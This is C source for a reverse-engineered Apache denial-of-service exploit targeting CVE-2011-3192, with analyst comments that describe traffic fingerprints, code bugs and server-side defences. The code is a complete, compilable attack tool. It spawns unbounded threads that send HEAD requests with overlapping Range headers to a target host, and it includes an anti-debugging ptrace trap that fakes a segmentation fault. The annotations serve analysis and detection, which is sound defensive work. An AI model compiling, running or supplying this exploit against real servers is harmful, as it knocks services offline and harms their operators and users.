/*
* This is a reverse engineered version of the exploit for CVE-2011-3192 made
* by ev1lut10n (http://jayakonstruksi.com/backupintsec/rapache.tgz).
* Copyright 2011 Ramon de C Valle <rcvalle@redhat.com>
*
* Compile with the following command:
* gcc -Wall -pthread -o rcvalle-rapache rcvalle-rapache.c
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <unistd.h>
#include <pthread.h>
void ptrace_trap(void) __attribute__ ((constructor));

/*
 * Anti-tracing check. The constructor attribute makes it run automatically
 * before main().
 *
 * PTRACE_TRACEME is refused when the process already has a tracer attached
 * (gdb, strace, ...). In that case the function writes a fake
 * "Segmentation fault" line to stdout and exits with status -1. For an
 * analyst, that message under a debugger is this check firing, not a crash.
 */
void
ptrace_trap(void)
{
	int request_accepted = ptrace(PTRACE_TRACEME, 0, 0, 0) >= 0;

	if (request_accepted)
		return;

	/* 19 == length of the message without its terminating NUL. */
	write(fileno(stdout), "Segmentation fault\n", 19);
	exit(-1);
}
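/*
 * Write an ANSI SGR escape sequence to stdout: ESC [ attr ; fg+30 ; bg+40 m.
 *
 * attr is emitted unchanged; 30 is added to fg and 40 to bg before printing.
 *
 * The sequence is formatted directly by printf(). The previous version built
 * it with sprintf() in a 13-byte stack buffer. The five fixed characters left
 * room for only seven digit/sign characters, so larger arguments wrote past
 * the end of the buffer. The output is unchanged for every input that used to
 * fit.
 */
void
w4rn41dun14mu(int attr, int fg, int bg)
{
	printf("%c[%d;%d;%dm", 0x1b, attr, fg + 30, bg + 40);
}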
/*
 * Print the program banner on stdout, preceded by the colour sequence for
 * attribute 0, foreground index 1 and background index 0.
 */
void
banner()
{
	static const char text[] =
	    "Remote Apache Denial of Service Exploit by ev1lut10n\n";

	w4rn41dun14mu(0, 1, 0);
	/* sizeof text - 1 == 53: the banner without its terminating NUL. */
	fwrite(text, sizeof text - 1, 1, stdout);
}
/*
 * Clear the terminal (ESC[2J), move the cursor to row 1, column 1 (ESC[1;1H)
 * and print a generic error line. Nothing in the code shown here calls it.
 */
void
gime_er_mas()
{
	static const char *const sequences[] = { "[2J", "[1;1H" };
	size_t k;

	for (k = 0; k < sizeof sequences / sizeof sequences[0]; k++)
		printf("%c%s", 0x1b, sequences[k]);

	puts("\nsorry dude there's an error...");
}
/* Argument block whose address main() passes to every thread_start() call. */
struct thread_info {
pthread_t thread_id; /* written by pthread_create() in main() */
int thread_num; /* loop index set in main(); thread_start() does not read it */
char *argv_string; /* target host name; main() points it at argv[1] */
};
/*
 * Worker thread body. For ten rounds it resolves the host name carried in the
 * thread_info argument, connects to that host's "http" service, writes one
 * fixed HEAD request and sleeps 0.3 s.
 *
 * arg points to a struct thread_info; only argv_string is read.
 * Always returns 0. A getaddrinfo() failure ends the whole process through
 * exit(EXIT_FAILURE), not just this thread.
 *
 * Traffic characteristics useful for detection:
 *   - HEAD / with a Range header listing overlapping ranges ("0-,0-").
 *     CVE-2011-3192, named in the file header, concerns httpd's handling of
 *     Range headers that carry multiple overlapping ranges.
 *   - Host is always the literal "localhost", whatever the real target is.
 *   - Header lines end with a bare LF, and the write length (71) is one more
 *     than the 70 characters of the literal, so a NUL byte is sent as well.
 * Server-side defences are a patched httpd and rejecting or stripping Range
 * headers that list multiple overlapping ranges.
 */
static void *
thread_start(void *arg)
{
struct thread_info *tinfo = (struct thread_info *) arg;
char hostname[64];
int j;
/*
 * NOTE(review): unbounded copy of a command-line string into a 64-byte stack
 * buffer; a longer host name overruns hostname[].
 */
strcpy(hostname, tinfo->argv_string);
j = 0;
while (j != 10) {
struct addrinfo hints;
struct addrinfo *result, *rp;
int sfd, s;
ssize_t nwritten;
/* Any address family, TCP stream sockets, no extra flags. */
memset(&hints, 0, sizeof(struct addrinfo));
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
hints.ai_flags = 0;
hints.ai_protocol = 0;
/* The name is resolved again on every round, so each round is a new lookup. */
s = getaddrinfo(hostname, "http", &hints, &result);
if (s != 0) {
fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(s));
exit(EXIT_FAILURE);
}
/*
 * Walk every returned address: open a socket and close it again only when
 * connect() fails. The loop always runs to the end of the list, so afterwards
 * sfd is whatever the final iteration left in it.
 */
for (rp = result; rp != NULL; rp = rp->ai_next) {
sfd = socket(rp->ai_family, rp->ai_socktype, rp->ai_protocol);
if (sfd == -1)
continue;
if (connect(sfd, rp->ai_addr, rp->ai_addrlen) == -1)
close(sfd);
}
if (result != NULL)
freeaddrinfo(result);
/* Fixed request bytes; see the header comment for their fingerprint. */
nwritten = write(sfd, "HEAD / HTTP/1.1\n"
"Host:localhost\n"
"Range:bytes=0-,0-\n"
"Accept-Encoding: gzip", 71);
/*
 * The descriptor is closed only when write() reports an error. On the success
 * path nothing in this function closes it, so open sockets accumulate in the
 * process.
 */
if (nwritten == -1)
close(sfd);
usleep(300000);
j++;
}
return 0;
}
/*
 * Entry point. Prints the banner, requires a host name in argv[1], then loops
 * forever creating worker threads running thread_start(): 50 per pass, one
 * every 0.5 s.
 *
 * Returns 0 only on the usage path (no argument given); otherwise the outer
 * loop never terminates and the process runs until it is killed or a worker
 * calls exit().
 *
 * Host-level indicators: steady thread creation with no upper bound, each
 * thread repeatedly resolving the same name and connecting to its http port.
 */
int
main(int argc, char *argv[])
{
int i;
struct thread_info tinfo;
banner();
if (argc <= 1) {
w4rn41dun14mu(0, 2, 0);
fwrite("\n[-] Usage : ./rapache hostname\n", 32, 1, stdout);
return 0;
}
w4rn41dun14mu(0, 3, 0);
printf("[+] Attacking %s please wait in minutes ...\n", argv[1]);
while (1) {
i = 0;
while (i != 50) {
/*
 * NOTE(review): every thread receives the address of the same stack object,
 * which this loop keeps rewriting. thread_id is overwritten on each call, the
 * pthread_create() result is not checked, and the threads are never joined or
 * detached.
 */
tinfo.thread_num = i;
tinfo.argv_string = argv[1];
pthread_create(&tinfo.thread_id, NULL, &thread_start, &tinfo);
usleep(500000);
i++;
}
}
}